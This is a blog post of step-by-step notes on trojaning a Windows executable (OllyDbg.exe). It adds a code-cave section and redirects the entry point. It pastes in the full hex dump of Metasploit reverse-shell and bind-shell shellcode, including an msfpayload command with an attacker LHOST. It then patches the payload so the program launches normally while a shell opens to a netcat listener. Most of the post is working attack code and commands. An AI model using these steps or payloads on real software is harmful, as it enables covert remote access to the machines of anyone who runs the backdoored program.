Wednesday, August 1, 2018

Backdooring Windows Apps

Here are summarized notes on how to get a working backdoor on a PE(Portable Executable) file on Windows 7. For this case, I backdoored OllyDbg.exe. The idea is to have seamless execution of OllyDbg while spawning a reverse shell on port 1978 to an attacker host.

Using standard MSF payload and encoder from BT5. Hijack execution flow into our code cave, no AV bypass or stub encoder. Standard utils such as LordPE to extend the section header and WVI32 to insert null bytes:

1. Use LordPe to create new section. Make it executable.

2. Use wvi32 to insert null chars, use same length as the section

3. Launch Immunity and open Ollydbg, take note of the module insertion point:

Original state:

00401000 >   EB 10          JMP SHORT OLLYDBG.00401012
00401002     66:623A        BOUND DI,DWORD PTR DS:[EDX]



4. Under "Memory" modules, look for the section ".Newsec" that contains the code cave 'null' mem location:

code cave: 00553000

5. Modify the entry point "JMP SHORT OLLYDBG.00401012" with the jmp statement to the code cave addr

JMP 00553000

Now, jump into the code cave using f7:


5a. Step into the code cave, enter the register saving cmds:

pushad
pushfd
<BT5 msfpayload here>
...



6. Use backtrack msfpayload to gen shellcode!! and select/highlight enough space in the code cave to binay paste the payload:

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.162 LPORT=1978 R > shell; hexdump -C shell | grep -v 0000013a |cut -d" " -f3-19|tr -d "(\n|'')"
fc e8 89 00 00 00 60 89  e5 31 d2 64 8b 52 30 8b52 0c 8b 52 14 8b 72 28  0f b7 4a 26 31 ff 31 c0ac 3c 61 7c 02 2c 20 c1  cf 0d 01 c7 e2 f0 52 578b 52 10 8b 42 3c 01 d0  8b 40 78 85 c0 74 4a 01d0 50 8b 48 18 8b 58 20  01 d3 e3 3c 49 8b 34 8b01 d6 31 ff 31 c0 ac c1  cf 0d 01 c7 38 e0 75 f403 7d f8 3b 7d 24 75 e2  58 8b 58 24 01 d3 66 8b0c 4b 8b 58 1c 01 d3 8b  04 8b 01 d0 89 44 24 245b 5b 61 59 5a 51 ff e0  58 5f 5a 8b 12 eb 86 5d68 33 32 00 00 68 77 73  32 5f 54 68 4c 77 26 07ff d5 b8 90 01 00 00 29  c4 54 50 68 29 80 6b 00ff d5 50 50 50 50 40 50  40 50 68 ea 0f df e0 ffd5 89 c7 68 c0 a8 00 a2  68 02 00 07 ba 89 e6 6a10 56 57 68 99 a5 74 61  ff d5 68 63 6d 64 00 89e3 57 57 57 31 f6 6a 12  59 56 e2 fd 66 c7 44 243c 01 01 8d 44 24 10 c6  00 44 54 50 56 56 56 4656 4e 56 56 53 56 68 79  cc 3f 86 ff d5 89 e0 4e56 46 ff 30 68 08 87 1d  60 ff d5 bb f0 b5 a2 5668 a6 95 bd 9d ff d5 3c  06 7c 0a 80 fb e0 75 05bb 47 13 72 6f 6a 00 53  ff d5

Here's one for bind shell:

msfpayload windows/shell_bind_tcp LPORT=1978 R > shell; hexdump -C shell | grep -v 00000155 |cut -d" " -f3-19|tr -d "(\n|'')"
fc e8 89 00 00 00 60 89  e5 31 d2 64 8b 52 30 8b52 0c 8b 52 14 8b 72 28  0f b7 4a 26 31 ff 31 c0ac 3c 61 7c 02 2c 20 c1  cf 0d 01 c7 e2 f0 52 578b 52 10 8b 42 3c 01 d0  8b 40 78 85 c0 74 4a 01d0 50 8b 48 18 8b 58 20  01 d3 e3 3c 49 8b 34 8b01 d6 31 ff 31 c0 ac c1  cf 0d 01 c7 38 e0 75 f403 7d f8 3b 7d 24 75 e2  58 8b 58 24 01 d3 66 8b0c 4b 8b 58 1c 01 d3 8b  04 8b 01 d0 89 44 24 245b 5b 61 59 5a 51 ff e0  58 5f 5a 8b 12 eb 86 5d68 33 32 00 00 68 77 73  32 5f 54 68 4c 77 26 07ff d5 b8 90 01 00 00 29  c4 54 50 68 29 80 6b 00ff d5 50 50 50 50 40 50  40 50 68 ea 0f df e0 ffd5 89 c7 31 db 53 68 02  00 07 ba 89 e6 6a 10 5657 68 c2 db 37 67 ff d5  53 57 68 b7 e9 38 ff ffd5 53 53 57 68 74 ec 3b  e1 ff d5 57 89 c7 68 756e 4d 61 ff d5 68 63 6d  64 00 89 e3 57 57 57 31f6 6a 12 59 56 e2 fd 66  c7 44 24 3c 01 01 8d 4424 10 c6 00 44 54 50 56  56 56 46 56 4e 56 56 5356 68 79 cc 3f 86 ff d5  89 e0 4e 56 46 ff 30 6808 87 1d 60 ff d5 bb f0  b5 a2 56 68 a6 95 bd 9dff d5 3c 06 7c 0a 80 fb  e0 75


6a. Take note of the esp register addr at the start of the code cave at the CLD instuction address space.

7. IMPORTANT: Step into the end of the code cave, change any "call ebx" or "push ebx" statement to NOPs. This will ensure that the payload doesn't exit and will continue execution flow.

7a. Take note of the esp address at the last addr of the code cave. Now, align the stack, eg:

In case you have a reverse shell payload, the ESP start and end are:
start esp: 0012FF68
end esp: 0012FD6C
Diff: 0012FF68 - 0012FD6C = 1FC

In case you have a bind shell payload:
Diff: 0012FF68 - 0012FD70 = 1F8

7a. Realign ESP and restore EDX value by adding this statement at the end of code cave:

add esp,1f8
popfd
popad
JMP 00401012
DB 66
DB 62
DB 3A




7b. Binary save to file. Reopen with Immunity and reexamine it.

8. Make sure nc listener is active (nc -nlvp 1978). If backdoored PE only starts after nc listerner ended, step thru(f7) the payload until you hit end of execution or WaitForSingleObject. **keep hitting f7 until you see WaitForSingleObject!! very long process, be patient. Else,

8a. If whatforsingleobject is in system file (ntdll or etc), search for DEC ESI, PUSH ESI, INC ESI in the shellcode and NOP it. These are the variable that is passed to the WaitForSingleObject func().

00553111 DEC ESI    <-----NOP this!!
00553112 PUSH ESI
00553112 INC ESI  <-------NOP this!!

8b. Save the changes(XOR'ed payload) to a new executable.

8a. Remove the offending code with NOP or adjust and save it to another file and rerun.

9. Rerun the executable, a reverse shell should appear and OllyDbg should start!





References:
http://www.securitynewspaper.com/2017/11/21/fully-undetectable-backdooring-pe-files/
https://haiderm.com/fully-undetectable-backdooring-pe-file/

at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)